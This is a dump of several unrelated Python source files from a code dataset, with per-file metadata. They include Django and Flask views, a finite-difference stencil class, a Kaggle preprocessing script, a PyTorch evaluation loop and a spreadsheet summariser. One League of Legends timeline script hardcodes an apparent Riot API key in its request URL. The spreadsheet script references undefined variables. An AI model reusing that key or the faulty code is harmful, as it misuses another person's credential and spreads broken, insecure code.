"usage_type": "call"}, {"api_name": "zope.schema.TextLine", "line_number": 60, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 60, "usage_type": "name"}, {"api_name": "zope.schema.BytesLine", "line_number": 66, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 66, "usage_type": "name"}, {"api_name": "zope.schema.TextLine", "line_number": 71, "usage_type": "call"}, {"api_name": "zope.schema", "line_number": 71, "usage_type": "name"}, {"api_name": "zope.schema.Bool", "line_number": 82, "usage_type": "call"},
{"api_name": "zope.schema", "line_number": 82, "usage_type": "name"}, {"api_name": "view.ResponseCacheSettings", "line_number": 92, "usage_type": "name"}, {"api_name": "zope.proxy.removeAllProxies", "line_number": 101, "usage_type": "call"}, {"api_name": "zope.proxy.removeAllProxies", "line_number": 102, "usage_type": "call"}, {"api_name": "view.context", "line_number": 102, "usage_type": "attribute"}, {"api_name": "zope.publisher.interfaces.browser.IDefaultBrowserLayer", "line_number": 129, "usage_type": "name"}, {"api_name": "zope.component.zcml.handler", "line_number": 158, "usage_type": "name"}, {"api_name": "interfaces.IResponseCacheSettings", "line_number": 162, "usage_type": "name"}]} +{"seq_id": "439994684", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect \nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import acupoint\nfrom django.utils import timezone\nfrom .acupoint import *\nfrom django.views.generic import ListView\nfrom django.db.models import Q\n\nclass IndexView(ListView):\n model = acupoint\n template_name = 'blog/index.html'\n context_object_name = 'post_list'\n paginate_by = 5\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n paginator = context.get('paginator')\n page = context.get('page_obj')\n is_paginated = context.get('is_paginated')\n pagination_data = self.pagination_data(paginator, page, is_paginated)\n context.update(pagination_data)\n return context\n\n def pagination_data(self, paginator, page, is_paginated):\n if not is_paginated:\n # 如果没有分页,则无需显示分页导航条,不用任何分页导航条的数据,因此返回一个空的字典\n return {}\n\n left = []\n right = []\n left_has_more = False\n right_has_more = False\n\n first = False\n last = False\n\n page_number = page.number\n\n total_pages = paginator.num_pages\n\n page_range = paginator.page_range\n\n if page_number == 1:\n right = page_range[page_number:page_number + 2]\n\n if right[-1] < total_pages - 1:\n right_has_more = True\n\n if right[-1] < total_pages:\n last = True\n\n elif page_number == total_pages:\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:page_number - 1]\n\n if left[0] > 2:\n left_has_more = True\n\n if left[0] > 1:\n first = True\n else:\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:page_number - 1]\n right = page_range[page_number:page_number + 2]\n if right[-1] < total_pages - 1:\n right_has_more = True\n if right[-1] < total_pages:\n last = True\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n data = {\n 'left': left,\n 'right': right,\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'first': first,\n 'last': last,\n }\n return data\n\n# @login_required\n# def altermanage(request):\n# provider = request.GET.get('provider')\n# if request.user.is_superuser:\n# alter(request)\n# elif request.user == provider:\n# alter(request)\n# else:\n# return render(request,'blog/index.html',{'msg': '没有操作权限'})\n#\n# def alter(request):\n# return render\n\ndef search(request):\n q = request.GET.get('q')\n error_msg = ''\n\n if not q:\n error_msg = \"请输入关键词\"\n return render(request, 'blog/index.html', {'error_msg': error_msg})\n\n post_list = acupoint.objects.filter(Q(title__icontains=q)\n | Q(author__icontains=q)\n | Q(acupuncture__icontains=q)\n | Q(symptom__icontains=q)\n | 
Q(disease__icontains=q)\n                                        | Q(date__icontains=q))\n    return render(request, 'blog/index.html', {'error_msg': error_msg,\n                                                'post_list': post_list})\n\n# def index(request):\n#     post_list = acupoint.objects.all().order_by('-date')\n#     return render(request, 'blog/index.html', context={'post_list': post_list})\n\ndef detail(request, pk):\n    post = get_object_or_404(acupoint, pk=pk)\n    return render(request, 'blog/acupoint.html', context={'post': post})\n\ndef logout_user(request):\n    logout(request)\n    # Redirect to a success page.\n    return HttpResponseRedirect(\"/accounts/login/\")\n\n\n\n", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4215, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 13, "usage_type": "name"}, {"api_name": "models.acupoint", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 104, "usage_type": "call"}, {"api_name": "models.acupoint.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.acupoint.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.acupoint", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 107, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 109, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 120, "usage_type": "call"}, {"api_name": "models.acupoint", "line_number": 120, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 124, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 126, "usage_type": "call"}]}
+{"seq_id": "319808950", "text": "from itertools import product\nimport numpy as np\nfrom .utils import to_long_index, to_index_tuple\n\n\nclass Stencil(object):\n    \"\"\"\n    Represent the finite difference stencil for a given differential operator.\n    \"\"\"\n\n    def __init__(self, diff_op, shape, old_stl=None, acc=None):\n        \"\"\"\n        Constructor for Stencil objects.\n\n        :param diff_op:\n            The differential operator for which to build the stencil;\n            it must provide a ``matrix(shape, acc)`` method.\n\n        :param shape: tuple of ints\n            Shape of the grid on which the stencil should be applied.\n\n        :param old_stl:\n            An existing stencil to reuse (not used by this constructor).\n\n        :param acc: (even) int > 0\n            The desired accuracy order of the finite difference scheme.\n\n        \"\"\"\n\n        self.shape = shape\n        self.diff_op = diff_op\n        self.char_pts = self._det_characteristic_points()\n        self.acc = None\n        if acc is not None:\n            self.acc = acc\n\n        self.data = {}\n\n        self._create_stencil()\n\n    def apply(self, u, idx0):\n        \"\"\" Applies the stencil to a point in an equidistant grid.\n\n        :param u: ndarray\n            An array with the function to differentiate.\n\n        :param idx0: int or tuple of ints\n            The index of the grid point where to differentiate the function.\n\n        :return:\n            The derivative
at the given point.\n        \"\"\"\n\n        if not hasattr(idx0, '__len__'):\n            idx0 = (idx0, )\n\n        typ = []\n        for axis in range(len(self.shape)):\n            if idx0[axis] == 0:\n                typ.append('L')\n            elif idx0[axis] == self.shape[axis] - 1:\n                typ.append('H')\n            else:\n                typ.append('C')\n        typ = tuple(typ)\n\n        stl = self.data[typ]\n\n        idx0 = np.array(idx0)\n        du = 0.\n        for o, c in stl.items():\n            idx = idx0 + o\n            du += c * u[tuple(idx)]\n\n        return du\n\n    def apply_all(self, u):\n        \"\"\" Applies the stencil to all grid points.\n\n        :param u: ndarray\n            An array with the function to differentiate.\n\n        :return:\n            An array with the derivative.\n        \"\"\"\n\n        assert self.shape == u.shape\n\n        ndims = len(u.shape)\n        if ndims == 1:\n            indices = list(range(len(u)))\n        else:\n            axes_indices = []\n            for axis in range(ndims):\n                axes_indices.append(list(range(u.shape[axis])))\n\n            axes_indices = tuple(axes_indices)\n            indices = list(product(*axes_indices))\n\n        du = np.zeros_like(u)\n\n        for idx in indices:\n            du[idx] = self.apply(u, idx)\n\n        return du\n\n    def _create_stencil(self):\n\n        matrix = self.diff_op.matrix(self.shape, acc=self.acc)\n\n        for pt in self.char_pts:\n\n            char_point_stencil = {}\n            self.data[pt] = char_point_stencil\n\n            index_tuple_for_char_pt = self._typical_index_tuple_for_char_point(pt)\n            long_index_for_char_pt = to_long_index(index_tuple_for_char_pt, self.shape)\n\n            row = matrix[long_index_for_char_pt, :]\n            long_row_inds, long_col_inds = row.nonzero()\n\n            for long_offset_ind in long_col_inds:\n                offset_ind_tuple = np.array(to_index_tuple(long_offset_ind, self.shape), dtype=np.int)\n                offset_ind_tuple -= np.array(index_tuple_for_char_pt, dtype=np.int)\n                char_point_stencil[tuple(offset_ind_tuple)] = row[0, long_offset_ind]\n\n    def _typical_index_tuple_for_char_point(self, pt):\n        index_tuple_for_char_pt = []\n        for axis, key in enumerate(pt):\n            if key == 'L':\n                index_tuple_for_char_pt.append(0)\n            elif key == 'C':\n                index_tuple_for_char_pt.append(self.shape[axis] // 2)\n            else:\n                index_tuple_for_char_pt.append(self.shape[axis] - 1)\n        return tuple(index_tuple_for_char_pt)\n\n    def _det_characteristic_points(self):\n        shape = self.shape\n        ndim = len(shape)\n        typ = [(\"L\", \"C\", \"H\")]*ndim\n        return product(*typ)\n\n\n", "sub_path": "findiff/stencils.py", "file_name": "stencils.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.to_long_index", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "utils.to_index_tuple", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 126, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 144, "usage_type": "call"}]}
+{"seq_id": "175191546", "text": "\"\"\"Spreadsheet Summary Printer\n\nThis script allows the user to print important values from exported spreadsheets.\n\nThe script requires that `openpyxl` be installed within the Python environment.\n\n\"\"\"\n\nimport sys\nimport logging\nimport openpyxl as xl\nimport datetime as dt\n\n\ndef get_month(cell_value):\n    
\"\"\"Extracts the month integer and returns the text name of the month\n\n Parameters\n ----------\n cell_value : datetime\n The spreadsheet cell value containing the month of the column\n\n Returns\n ----------\n month_name : str\n The name of the month from the choosen cell\n \"\"\"\n\n month_int = cell_value.month\n month_name = dt.date(1900, month_int, 1).strftime('%B').lower()\n return month_name\n\n\ndef get_year(cell_value):\n \"\"\"Extracts the year and returns it\n\n Parameters\n ----------\n cell_value : datetime\n The spreadsheet cell value containing the month of the column\n\n Returns\n ----------\n year : str\n The year from the choosen cell\n \"\"\"\n\n year_int = cell_value.year\n year = str(year_int)\n return year\n\n\ndef extract_date_from_file(filename):\n \"\"\"Extracts the month and year from the filename\n\n Parameters\n ----------\n filename : str\n The name of the file\n\n Returns\n ----------\n date : datetime\n A datetime object for the month and year, starting on the first day and first second.\n \"\"\"\n\n try:\n split_filename = filename.split('_')\n month = split_filename[3]\n year = split_filename[4].split('.')[0]\n combined_string = month + ' ' + year\n date = dt.datetime.strptime(combined_string, '%B %Y')\n return date\n except:\n logging.error(\"The file does not have a valid month and year.\")\n sys.exit(1)\n\n\ndef get_percentage(string):\n \"\"\"Extracts the month and year from the filename\n\n Parameters\n ----------\n string : str\n The number as a decimal\n\n Returns\n ----------\n formatted_string : str\n The number as a percentage\n \"\"\"\n formatted_string = \"{:.2%}\".format(string)\n return formatted_string\n\n\ndef main():\n logging.basicConfig(filename='expedia.log', format='%(asctime)s - %(levelname)% - %(message)s')\n\n try:\n filename = sys.argv[1]\n file_date = extract_date_from_file(filename)\n except:\n logging.error(\"The wrong file was provided.\")\n sys.exit(1)\n\n wb = xl.open(filename)\n\n try:\n sheet1 = wb['Summary Rolling MoM']\n sheet2 = wb['VOC Rolling MoM']\n except:\n logging.error(\"The file does not have the right worksheets.\")\n sys.exit(1)\n\n # Search row range for matching month, year value!!!\n for row in sheet1.iter_rows(min_row=2, max_row=13, max_col=6, values_only=True):\n month = get_month(row[0])\n year = get_year(row[0])\n\n if file_month == month and file_year == year:\n logging.info(f\"{month}, {year} - Calls Offered: {row[1]:,}\")\n logging.info(f\"{month}, {year} - Abandon after 30s: {get_percentage(row[2])}\")\n logging.info(f\"{month}, {year} - FCR: {get_percentage(row[3])}\")\n logging.info(f\"{month}, {year} - DSAT: {get_percentage(row[4])}\")\n logging.info(f\"{month}, {year} - CSAT: {get_percentage(row[5])}\")\n\n # Search col range for matching month, year value!!!\n for col in sheet2.iter_cols(min_row=0, max_row=9, min_col=2, max_col=24, values_only=True):\n month = get_month(col[0])\n year = get_year(col[0])\n\n if file_month == month and file_year == year:\n logging.info(f\"{month}, {year} - Promoters: {col[3]}, {'Good' if col[3] > 200 else 'Bad'}\")\n logging.info(f\"{month}, {year} - Passives: {col[5]}, {'Good' if col[5] > 100 else 'Bad'}\")\n logging.info(f\"{month}, {year} - Detractors: {col[7]}, {'Good' if col[7] > 100 else 'Bad'}\")\n\n print('Check log file for output')\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "week_1/weekend_project_1/spreadsheet.py", "file_name": "spreadsheet.py", "file_ext": "py", "file_size_in_byte": 3960, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.date", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 100, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 104, "usage_type": "call"}, {"api_name": "openpyxl.open", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 112, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 133, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "569872652", "text": "from flask import Blueprint , jsonify , request, make_response\nfrom app.defend.defend_module import defend_module\nfrom app.auth import auth_check\n\ndefend_handler = Blueprint('defend_handler', __name__)\n\n@defend_handler.route('/newissue' , methods=['POST'])\n@auth_check()\ndef defend_issue_route(userid = -1):\n request_json = request.json\n request_json['userid'] = userid\n msg = defend_module.create_issue(request_json)\n return jsonify(msg)\n\n@defend_handler.route('/queryissue' , methods=['POST'])\n@auth_check()\ndef defend_query_route(userid = -1):\n request_json = request.json\n msg = defend_module.query_issue(request_json)\n return jsonify(msg)\n\n@defend_handler.route('/userissues' , methods=['GET'])\n@auth_check()\ndef defend_user_issues_route(userid = -1):\n msg = defend_module.query_user_issues(userid)\n return jsonify(msg)\n\n@defend_handler.route('/delissue' , methods=['POST'])\n@auth_check()\ndef defend_del_issue_route(userid = -1):\n request_json = request.json\n request_json['userid'] = userid\n msg = defend_module.del_issue(request_json)\n return jsonify(msg)", "sub_path": "app/defend/defend_blueprint.py", "file_name": "defend_blueprint.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 10, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.create_issue", "line_number": 12, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 13, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 18, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.query_issue", "line_number": 19, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 20, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 16, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module.query_user_issues", "line_number": 25, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "app.defend.defend_module.defend_module.del_issue", "line_number": 33, "usage_type": "call"}, {"api_name": "app.defend.defend_module.defend_module", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 34, "usage_type": "call"}, {"api_name": "app.auth.auth_check", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "550469025", "text": "import requests\nimport json\n\nurl = \"https://kr.api.riotgames.com/lol/match/v4/timelines/by-match/4659518008?api_key=RGAPI-4dcd2099-2605-4440-9864-f53a305141e7\"\ntime_data = requests.get(url).json()[\"frames\"]\n# print(time_data)\n\n# 필수 이벤트\nevents_creator_id = [\"WARD_PLACED\"]\nevents_killer_id = [\"WARD_KILL\", \"BUILDING_KILL\", \"CHAMPION_KILL\"]\nevents_moster_kill = [\"ELITE_MONSTER_KILL\"]\n\npart_set = [dict() for _ in range(11)]\n# print(part_set)\n\ntime = 22 # 사건시간이 22~23인 경우\n\nfor t in range(1, time):\n events = time_data[t][\"events\"]\n for event in events:\n # 이벤트가 필수 이벤트(creatorId)라면\n if event[\"type\"] in events_creator_id:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"creatorId\"]].setdefault(real_event, 0)\n part_set[event[\"creatorId\"]][real_event] += 1\n\n # 이벤트가 필수 이벤트(killerId)라면\n elif event[\"type\"] in events_killer_id:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"killerId\"]].setdefault(real_event, 0)\n part_set[event[\"killerId\"]][real_event] += 1\n \n # 이벤트가 필수 이벤트(monsterkill)라면\n elif event[\"type\"] in events_moster_kill:\n real_event = event[\"type\"]\n # 해당 인덱스의 dict에 횟수를 누적한다\n part_set[event[\"killerId\"]].setdefault(real_event, [])\n part_set[event[\"killerId\"]][real_event] += [event[\"monsterType\"]]\n\n \n # 사건 직전 누적 골드\n if t == time - 1:\n part_info = time_data[t][\"participantFrames\"]\n # 1번 부터 10번까지 누적 기록 저장\n for idx in range(1, 11):\n part_set[idx][\"totalGold\"] = part_info[str(idx)][\"totalGold\"]\n part_set[idx][\"level\"] = part_info[str(idx)][\"level\"]\n part_set[idx][\"minionsKilled\"] = part_info[str(idx)][\"minionsKilled\"]\n\nprint(part_set)\n", "sub_path": "데마시아5/DEMACIA5/djangobackend/timeline_before.py", "file_name": "timeline_before.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "317492170", "text": "#这个文件主要对缺失值进行了处理,少的直接用平均值进行填充,缺的多的用xgboost进行预测\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as 
sns\nfrom scipy.stats import mode\n\nfrom sklearn import model_selection, preprocessing\nimport xgboost as xgb\nimport datetime\n#now = datetime.datetime.now()\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import make_scorer\n\npd.options.mode.chained_assignment = None  # default='warn'\npd.set_option('display.max_columns', 500)\n\ntrain = pd.read_csv('kaggle/russia/train.csv')\ntest = pd.read_csv('kaggle/russia/test.csv')\nmacro = pd.read_csv('kaggle/russia/macro.csv')\n\n\ny_train = train[\"price_doc\"]\nx_train = train.drop([\"id\", \"timestamp\", \"price_doc\"], axis=1)\nx_test = test.drop([\"id\", \"timestamp\"], axis=1)\nid_test = test.id\n\n# can't merge train with test because the kernel runs for a very long time\ndtype_df=x_train.dtypes.reset_index()\ndtype_df.columns=[\"Count\",\"ColumnsType\"]\ndtype_df.groupby(\"ColumnsType\").aggregate(\"count\").reset_index()\n# collect the columns whose dtype is object\ncol_object=[]\nfor x in dtype_df[dtype_df['ColumnsType']==object]['Count']:\n    col_object.append(x)\n# count result: 155 int64 columns, 119 float64, 15 object\n# missing value statistics\nmissing_df=train.isnull().sum(axis=0).reset_index()\nmissing_df.columns=['columns_name','missing_count']\nmissing_df=missing_df.ix[missing_df['missing_count']>0]\nmissing_df['missing_ratio']=missing_df['missing_count']/30471\n\nmissing_df1=test.isnull().sum(axis=0).reset_index()\nmissing_df1.columns=['columns_name','missing_count']\nmissing_df1=missing_df1.ix[missing_df1['missing_count']>0]\nmissing_df1['missing_ratio']=missing_df1['missing_count']/7662\n\nfor x in missing_df['columns_name']:\n    # print(x,\">>\",x_test[x].dtype)\n    if x_test[x].dtype == 'int64':\n        print(x)\n\nfor x in x_test.columns:\n    if x_test[x].dtype == 'object':\n        print(x)\nl1=[]\nl2=[]\nfor x in missing_df['columns_name']:\n    l1.append(x)\nfor x in missing_df1['columns_name']:\n    l2.append(x)\n[x for x in l1 if x not in l2]\n\nind=np.arange(missing_df.shape[0])\nwidth=0.9\nfig, ax = plt.subplots(figsize=(12,18))\nrects = ax.barh(ind, missing_df.missing_count.values, color='y')\nax.set_yticks(ind)\nax.set_yticklabels(missing_df.columns_name.values, rotation='horizontal')\nax.set_xlabel(\"Count of missing values\")\nax.set_title(\"Number of missing values in each column\")\nplt.show(block=False)\n\n# data=train.groupby(['Title','Pclass'])['age']\n# train['age']=data.transform(lambda x:x.fillna())\n#\n#------------------------------------------\n# handle missing values\n#--------------------------------------------\n\nfull=pd.concat([train,test])\n# state has one outlier value 33; replace it with 3\nfull['state'].replace(33,3,inplace=True)\n# mode function imported from scipy; note the input cannot contain missing values\n# fill in product_type and green_part_2000, which are missing in test\nmode(full['green_part_2000']).mode[0]\nfull['green_part_2000'].fillna(full['green_part_2000'].mean(),inplace=True)\nfull['product_type'].value_counts()\nfull['product_type'].fillna('Investment',inplace=True)\n# clean up build_year\nfull.build_year.value_counts()\nfull.loc[full['build_year']==20052009,'build_year']=2005\nfull.loc[full['build_year']==0,'build_year']=np.nan\nfull.loc[full['build_year']==1,'build_year']=np.nan\nfull.loc[full['build_year']==20,'build_year']=2000\nfull.loc[full['build_year']==215,'build_year']=2015\nfull.loc[full['build_year']==3,'build_year']=np.nan\nfull.loc[full['build_year']==2,'build_year']=np.nan\nfull.loc[full['build_year']==71,'build_year']=np.nan\nfull.loc[full['build_year']==4965,'build_year']=np.nan\n# re-partition sub_area; this script does not do it, it was binned in dataprocess1.py and the result was not very good\n\n# full.loc[full['sub_area']=='']\n\nfull.drop([\"id\",
\"timestamp\", \"price_doc\"], axis=1,inplace=True)\n\n\n\n#之前是289列,get_dummies之后是451列\nfull=pd.get_dummies(full,columns=col_object)\n\n\n#模型调参\ndef get_model(estimator, parameters, X_train, y_train, scoring):\n model = GridSearchCV(estimator, param_grid=parameters, scoring=scoring)\n model.fit(X_train, y_train)\n return model.best_estimator_\n\n#\n# X=full[full.floor.notnull()].drop('floor',axis=1)\n# y=full[full.floor.notnull()].floor\n#\n# X_train,X_test,y_train,y_test=train_test_split(X,y,random_state=2017)\n# XGB = xgb.XGBRegressor(max_depth=4, seed= 2017)\nscoring = make_scorer(mean_absolute_error, greater_is_better=False)\nparameters = {'reg_alpha':np.linspace(0.1,1.0,5), 'reg_lambda': np.linspace(1.0,3.0,5)}\n# reg_xgb = get_model(XGB, parameters, X_train, y_train, scoring)\n# print (reg_xgb)\n# print (\"Mean absolute error of test data: {}\".format(mean_absolute_error(y_test, reg_xgb.predict(X_test))))\n# #3.49323\n# pred = reg_xgb.predict(full[full.floor.isnull()].drop('floor', axis=1))\n# full.loc[(full.floor.isnull()),'floor']=pred\nfor att in missing_df['columns_name']:\n print(train[att].isnull().sum())\n\nfor att in missing_df['columns_name']:\n X = full[full[att].notnull()].drop(att, axis=1)\n y = full[full[att].notnull()][att]\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2017)\n\n XGB = xgb.XGBRegressor(max_depth=4, seed=2017)\n\n reg_xgb = get_model(XGB, parameters, X_train, y_train, scoring)\n print(reg_xgb)\n print(att,\"Mean absolute error of test data: {}\".format(mean_absolute_error(y_test, reg_xgb.predict(X_test))))\n pred = reg_xgb.predict(full[full[att].isnull()].drop(att, axis=1))\n full.loc[(full[att].isnull()), att] = pred\n\n\n\nfull.to_csv('kaggle/russia/full.csv', index=False)", "sub_path": "zyf/dataprocess.py", "file_name": "dataprocess.py", "file_ext": "py", "file_size_in_byte": 5636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.options", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.set_option", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 83, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 102, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 117, "usage_type": "call"}, {"api_name": 
"sklearn.metrics.make_scorer", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 127, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 141, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "313812459", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 8 21:10:53 2019\n\n@author: ssharma\n\"\"\"\n#import numpy as np\nimport torch\nfrom torch.autograd import Variable\n#from sklearn import metrics\nfrom .conf_mat import calc_conf_mat\n\n\ndef evaluate(model, data_loader, criterion, num_classes, DEVICE):\n model.eval()\n model = model.to(DEVICE)\n\n n_correct = 0\n loss = 0\n\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target = Variable(data), Variable(target)\n data = data.float()\n data = data.to(DEVICE)\n target = target.to(DEVICE)\n\n output = model(data)\n\n loss += criterion(output, target).item()\n\n pred = output.data.max(1, keepdim=True)[1]\n n_correct += pred.eq(target.data.view_as(pred)).cpu().sum().item()\n\n if batch_idx == 0:\n pred_cat = pred\n targ_cat = target\n else:\n pred_cat = torch.cat((pred_cat, pred))\n targ_cat = torch.cat((targ_cat, target))\n\n conf_matrix = calc_conf_mat(pred_cat, targ_cat, num_classes)\n\n loss /= len(data_loader)\n acc = n_correct / len(data_loader.dataset)\n\n return (loss, acc), conf_matrix\n", "sub_path": "birdsong/training/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.no_grad", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 41, "usage_type": "call"}, {"api_name": "conf_mat.calc_conf_mat", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "464955749", "text": "import datetime \n\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom reversion import get_registered_models, create_revision\n\nfrom publishing import register\n\nfrom .admin import PublishingAdmin\nfrom .models import Publishing\nfrom .models import DRAFT_STATUS\nfrom .options import PublishingOptions\n\nclass 